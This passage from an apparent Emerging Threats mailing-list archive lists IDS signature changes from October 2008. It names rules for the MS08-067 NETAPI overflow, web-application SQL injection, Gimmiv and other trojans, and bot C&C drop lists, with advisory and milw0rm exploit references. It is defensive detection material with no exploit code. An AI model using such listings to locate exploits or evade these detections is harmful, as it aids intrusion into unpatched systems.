(19) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008710 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008711 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (21) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008712 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008713 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008714 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008715 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008716 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (26) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008717 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008718 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008719 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008720 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008721 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008722 || ET WEB_SPECIFIC Simple Customer contact.php SQL injection || bugtraq,28852 2008723 || ET WEB_SPECIFIC ShopMaker product.php id Parameter Remote SQL Injection || bugtraq,31854 || url,www.milw0rm.com/exploits/6799 2008724 || ET WEB_SPECIFIC Bahar Download Script aspkat.asp SQL Injection || bugtraq,31852 2008725 || ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection || url,secunia.com/advisories/32336 || url,milw0rm.com/exploits/6777 2008726 || ET TROJAN Gimmiv Infection Ping Outbound 2008727 || ET TROJAN Gimmiv Infection Ping Inbound 2400008 || ET DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso 2401008 || ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso -> Added to emerging-virus.rules (1): #by michael sconzo [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (1): 2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz -> Removed from emerging-sid-msg.map.txt (1): 2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz From emerging at emergingthreats.net Sat Oct 25 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 25 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081025200008.77F8745026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 25 16:00:08 2008 [***] [+++] Added rules: [+++] 2008728 - ET TROJAN General Downloader URL - Post Infection (emerging-virus.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (3): 2008728 || ET TROJAN General Downloader URL - Post Infection 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org -> Added to emerging-sid-msg.map.txt (3): 2008728 || ET TROJAN General Downloader URL - Post Infection 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Oct 25 18:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 25 Oct 2008 18:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes Message-ID: <20081025220008.F003345026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 25 18:00:08 2008 [***] [+++] Added rules: [+++] 2008678 - ET EXPLOIT Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods (emerging-exploit.rules) 2008679 - ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (dish.php) (emerging-web_sql_injection.rules) 2008680 - ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (menu.php) (emerging-web_sql_injection.rules) 2008681 - ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php (emerging-malware.rules) 2008682 - ET TROJAN Trojan.Zonebac.D (emerging-virus.rules) 2008683 - ET EXPLOIT Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow (emerging-exploit.rules) 2008684 - ET WEB_SPECIFIC E-Shop Shopping Cart Script search_results.php SQL Injection (emerging-web_sql_injection.rules) 2008685 - ET WEB_SPECIFIC Joomla DS-Syndicate Component feed_id SQL Injection (emerging-web_sql_injection.rules) 2008686 - ET WEB_SPECIFIC zeeproperty adid Parameter Remote SQL Injection (emerging-web_sql_injection.rules) 2008687 - ET WEB PassWiki site_id Parameter Local File Inclusion (emerging-web.rules) 2008688 - ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection (emerging-web_sql_injection.rules) 2008689 - ET TROJAN Gimmiv.A.dll Infection (emerging-virus.rules) 2008690 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1) (emerging-exploit.rules) 2008691 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2) (emerging-exploit.rules) 2008692 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3) (emerging-exploit.rules) 2008693 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4) (emerging-exploit.rules) 2008694 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5) (emerging-exploit.rules) 2008695 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (6) (emerging-exploit.rules) 2008696 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7) (emerging-exploit.rules) 2008697 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8) (emerging-exploit.rules) 2008698 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9) (emerging-exploit.rules) 2008699 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10) (emerging-exploit.rules) 2008700 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (emerging-exploit.rules) 2008701 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11) (emerging-exploit.rules) 2008702 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12) (emerging-exploit.rules) 2008703 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13) (emerging-exploit.rules) 2008704 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14) (emerging-exploit.rules) 2008705 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) (emerging-exploit.rules) 2008706 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16) (emerging-exploit.rules) 2008707 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17) (emerging-exploit.rules) 2008708 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18) (emerging-exploit.rules) 2008709 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19) (emerging-exploit.rules) 2008710 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20) (emerging-exploit.rules) 2008711 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (21) (emerging-exploit.rules) 2008712 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22) (emerging-exploit.rules) 2008713 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23) (emerging-exploit.rules) 2008714 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24) (emerging-exploit.rules) 2008715 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) (emerging-exploit.rules) 2008716 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (26) (emerging-exploit.rules) 2008717 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27) (emerging-exploit.rules) 2008718 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28) (emerging-exploit.rules) 2008719 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29) (emerging-exploit.rules) 2008720 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30) (emerging-exploit.rules) 2008721 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2) (emerging-exploit.rules) 2008722 - ET WEB_SPECIFIC Simple Customer contact.php SQL injection (emerging-web_sql_injection.rules) 2008723 - ET WEB_SPECIFIC ShopMaker product.php id Parameter Remote SQL Injection (emerging-web_sql_injection.rules) 2008724 - ET WEB_SPECIFIC Bahar Download Script aspkat.asp SQL Injection (emerging-web_sql_injection.rules) 2008725 - ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection (emerging-web_sql_injection.rules) 2008726 - ET TROJAN Gimmiv Infection Ping Outbound (emerging-virus.rules) 2008727 - ET TROJAN Gimmiv Infection Ping Inbound (emerging-virus.rules) 2008728 - ET TROJAN General Downloader URL - Post Infection (emerging-virus.rules) 2400008 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2401008 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules) 2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) [///] Modified active rules: [///] 2008391 - ET MALWARE Suspicious User-Agent (svchost) (emerging-malware.rules) 2008668 - ET WEB_SPECIFIC myEvent viewevent.php SQL Injection (emerging-web_sql_injection.rules) 2008669 - ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection (emerging-web_sql_injection.rules) 2008670 - ET WEB_SPECIFIC SweetCMS page SQL Injection (emerging-web_sql_injection.rules) 2008672 - ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection (emerging-web_sql_injection.rules) 2008673 - ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack (emerging-exploit.rules) 2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules) 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules) 2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules) 2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules) 2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules) 2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules) 2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules) 2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules) 2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules) 2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules) 2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules) 2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules) 2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules) 2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules) 2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules) 2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules) 2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules) 2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules) 2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules) 2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules) 2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules) 2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules) 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-drop-BLOCK.rules (2): # VERSION 1338 # Generated 2008-10-25 00:03:02 EDT -> Added to emerging-drop.rules (2): # VERSION 1338 # Generated 2008-10-25 00:03:02 EDT -> Added to emerging-exploit.rules (2): #by stillsecure #by Secureworks -> Added to emerging-malware.rules (1): #by Deapesh Misra -> Added to emerging-sid-msg.map (55): 2008678 || ET EXPLOIT Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods || url,secunia.com/Advisories/32337/ 2008679 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (dish.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/ 2008680 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (menu.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/ 2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || url,www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz 2008682 || ET TROJAN Trojan.Zonebac.D 2008683 || ET EXPLOIT Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow || url,www.milw0rm.com/exploits/6793 || bugtraq,31814 2008684 || ET WEB_SPECIFIC E-Shop Shopping Cart Script search_results.php SQL Injection || bugtraq,30692 2008685 || ET WEB_SPECIFIC Joomla DS-Syndicate Component feed_id SQL Injection || url,www.milw0rm.com/exploits/6792 || url,www.secunia.com/advisories/32321 2008686 || ET WEB_SPECIFIC zeeproperty adid Parameter Remote SQL Injection || url,milw0rm.com/exploits/6780 || url,secunia.com/Advisories/32333/ 2008687 || ET WEB PassWiki site_id Parameter Local File Inclusion || bugtraq,29455 2008688 || ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection || url,www.milw0rm.com/exploits/6795 || url,secunia.com/advisories/32347/ 2008689 || ET TROJAN Gimmiv.A.dll Infection || url,www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin32%2fGimmiv.A 2008690 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008691 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008692 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008693 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008694 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008695 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (6) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008696 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008697 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008698 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008699 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008700 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008701 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008702 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008703 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008704 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008705 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008706 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008707 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008708 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008709 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008710 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008711 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (21) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008712 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008713 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008714 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008715 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008716 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (26) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008717 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008718 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008719 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008720 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008721 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008722 || ET WEB_SPECIFIC Simple Customer contact.php SQL injection || bugtraq,28852 2008723 || ET WEB_SPECIFIC ShopMaker product.php id Parameter Remote SQL Injection || bugtraq,31854 || url,www.milw0rm.com/exploits/6799 2008724 || ET WEB_SPECIFIC Bahar Download Script aspkat.asp SQL Injection || bugtraq,31852 2008725 || ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection || url,secunia.com/advisories/32336 || url,milw0rm.com/exploits/6777 2008726 || ET TROJAN Gimmiv Infection Ping Outbound 2008727 || ET TROJAN Gimmiv Infection Ping Inbound 2008728 || ET TROJAN General Downloader URL - Post Infection 2400008 || ET DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso 2401008 || ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org -> Added to emerging-sid-msg.map.txt (55): 2008678 || ET EXPLOIT Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods || url,secunia.com/Advisories/32337/ 2008679 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (dish.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/ 2008680 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (menu.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/ 2008681 